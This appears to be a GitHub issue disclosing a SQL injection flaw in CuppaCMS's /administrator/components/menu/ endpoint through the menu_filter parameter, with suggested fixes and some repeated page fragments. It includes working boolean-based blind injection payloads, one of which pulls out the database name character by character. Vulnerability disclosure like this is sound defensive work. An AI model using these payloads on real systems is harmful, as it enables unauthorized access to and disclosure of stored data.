VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters.
Description: The vulnerability is present in the “/administrator/components/menu/" , and can be
exploited throuth a POST request via the ‘path=component/menu/&menu_filter=3’ parameters.
Impact: Allow attacker inject query and access , disclosure of all data on the system.
Suggestions: User input should be filter, Escaping and Parameterized Queries.
Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
Payload exploit example: path=component/menu/&menu_filter=3' and
if(SUBSTRING(database(),index,1)='character','1','0')='1
Payload exploit: path=component/menu/&menu_filter=3' and
if(SUBSTRING(database(),1,1)='c','1','0')='1
Proof of concept (POC):
Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
Request and Response:
Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
The text was updated successfully, but these errors were encountered:
truonghuuphuc
changed the title
SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters.
SQL injection vulnerability exists in CuppaCMS part 2
Jan 10, 2022
truonghuuphuc
changed the title
SQL injection vulnerability exists in CuppaCMS part 2
SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/
Jan 13, 2022
“/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters.
exploited throuth a POST request via the ‘path=component/menu/&menu_filter=3’ parameters.
if(SUBSTRING(database(),index,1)='character','1','0')='1
if(SUBSTRING(database(),1,1)='c','1','0')='1
Report.pdf
The text was updated successfully, but these errors were encountered: